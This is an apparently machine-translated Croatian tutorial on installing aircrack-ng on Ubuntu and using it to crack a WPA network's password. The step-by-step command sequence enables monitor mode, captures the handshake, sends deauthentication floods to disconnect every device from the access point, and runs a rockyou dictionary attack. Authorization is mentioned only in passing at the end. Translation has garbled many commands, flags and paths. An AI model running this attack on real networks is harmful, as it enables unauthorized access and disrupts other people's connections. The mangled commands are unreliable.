Instalirajte Aircrack na Ubuntu

Install Aircrack Ng Ubuntu



Aircrack-ng je cijeli paket alata za bežičnu sigurnosnu reviziju. Može se koristiti za praćenje, testiranje, razbijanje ili napad na bežične sigurnosne protokole poput WEP, WPA, WPA2. Aircrack-ng temelji se na naredbenom retku i dostupan je za Windows i Mac OS i druge Unix operativne sustave. Aircrack-ng paket sadrži mnogo alata koji se koriste u različite svrhe, ali ovdje ćemo pogledati samo neke važne alate koji se češće koriste u testiranju bežične sigurnosti.

Airmon-ng







Airmon-ng se koristi za upravljanje načinima rada bežične kartice i za ubijanje nepotrebnih procesa dok se koristi aircrack-ng. Da biste namirisali bežičnu vezu, morate promijeniti bežičnu karticu iz upravljanog načina rada u način nadzora i u tu se svrhu koristi airmon-ng.



Airodump-ng



Airodump-ng je bežični njuškalo koje može uhvatiti bežične podatke s jedne ili više bežičnih pristupnih točaka. Koristi se za analizu pristupnih točaka u blizini i snimanje rukovanja.





Zračna predstava

Aireplay-ng se koristi za napade ponavljanja i kao paketni injektor. Korisnici mogu otkazati autentifikaciju iz njihovih pristupnih točaka radi snimanja rukovanja.



Airdecap-ng

Airdecap-ng koristi se za dešifriranje šifriranih bežičnih paketa WEP, WPA/WPA2 s poznatim ključem.

Aircrack-ng

Aircrack-ng se koristi za napad na bežične protokole WPA/WEP kako bi se pronašao ključ.

Aircrack-ng je jednostavno instalirati u Ubuntu pomoću APT-a. Samo upišite sljedeću naredbu i to će instalirati sve alate dostupne u paketu Aircrack-ng.

sudo apt-get ažuriranje
sudo apt-get install -iaircrack-ng

Upotreba

U ovom ćemo članku brzo pogledati kako koristiti aircrack-ng za razbijanje šifrirane bežične mreže (TR1CKST3R u ovom primjeru) za pronalaženje lozinke.

Prije svega, navedite sve dostupne bežične kartice spojene na vaše računalo pomoću naredbe 'iwconfig'.

Za ovaj ćemo vodič koristiti 'wlxc83a35cb4546' nazivnu bežičnu karticu (ovo bi moglo biti drugačije u vašem slučaju). Ubijte sve procese koji se izvode na bežičnoj kartici pomoću airmon-ng-a.

[zaštićena e -pošta]: ~ $sudoairmon-ng provjeraubiti
Pokrenite način rada Monitor na ‘wlxc83a35cb4546’ upisivanjem
[zaštićena e -pošta]: ~ $sudoairmon-ng start wlxc83a35cb4546

Airmon-ng je sada pokrenuo način rada Monitor na bežičnoj kartici, pojavit će se kao drugi naziv 'wlan0mon'. Ponovno pokrenite 'iwconfig' da biste naveli pojedinosti o bežičnoj mreži.

Zatim pomoću airodump-ng pogledajte obližnje bežične pristupne točke i njihova svojstva.

[zaštićena e -pošta]: ~ $sudoairodump-ng wlan0mon

Pretraživanje možete suziti pomoću filtara MAC (–bssid) i kanala (-c). Da bismo snimili rukovanje (rukovanje sadrži šifriranu lozinku), moramo svoje pakete negdje spremiti pomoću opcije –write. Tip,

[zaštićena e -pošta]: ~ $sudoairodump-ng--bss6C: B7:49: FC:62: E4
-c jedanaestwlan0mon--pisati /tmp/rukovanje.kapa

--bss: MAC adresa pristupne točke

-c: Kanal pristupne točke[1-13]

--pisati: Pohranjuje zarobljene pakete na određenom mjestu

Sada moramo poništiti provjeru autentičnosti svakog uređaja s ove pristupne točke pomoću uslužnog programa Aireplay-ng. Pisati

[zaštićena e -pošta]: ~ $sudoaireplay-ng-0 100 -do [MAC_ADD]wlan0mon

-a: Odredite MAC pristupnih točaka za Aireplay-ng

-0: Odredite broj deauth paketa za slanje

Nakon nekog vremena svi će uređaji biti prekinuti s te pristupne točke, kada se pokušaju ponovno povezati, pokretanje airodump-ng uhvatit će rukovanje. Pojavit će se na vrhu pokrenutog airodump-ng.

Rukovanje je pohranjeno u direktoriju ‘/tmp/’ i sadrži šifriranu lozinku koja se može grubo forsirati izvan mreže pomoću rječnika. Za razbijanje lozinke koristit ćemo Aircrack-ng. Tip

[zaštićena e -pošta]: ~ $sudoaircrack-ng/tmp/rukovanje.cap-01.cap-u
/usr/udio/popisi riječi/rockyou.txt
-u: Odredite mjesto rječnika

Aircrack-ng će proći kroz popis lozinki, a ako se pronađe, prikazat će lozinku koja se koristi kao ključ.

U ovom slučaju, aircrack-ng je pronašao lozinku koja se koristi '123456789'.

Sada zaustavite način rada Monitor na bežičnoj kartici i ponovno pokrenite upravitelja mreže.

[zaštićena e -pošta]: ~ $sudoairmon-ng stop wlan0mon
[zaštićena e -pošta]: ~ $sudoponovno pokretanje upravitelja mrežne usluge

Zaključak

Aircrack-ng se može koristiti za reviziju bežične sigurnosti ili za razbijanje zaboravljenih lozinki. Za tu svrhu dostupni su neki drugi slični alati poput Kismeta, ali aircrack-ng je poznatiji po dobroj podršci, svestranosti i širokom rasponu alata. Jednostavno je za korištenje sučelje naredbenog retka koje se lako može automatizirati pomoću bilo kojeg skriptnog jezika poput Pythona.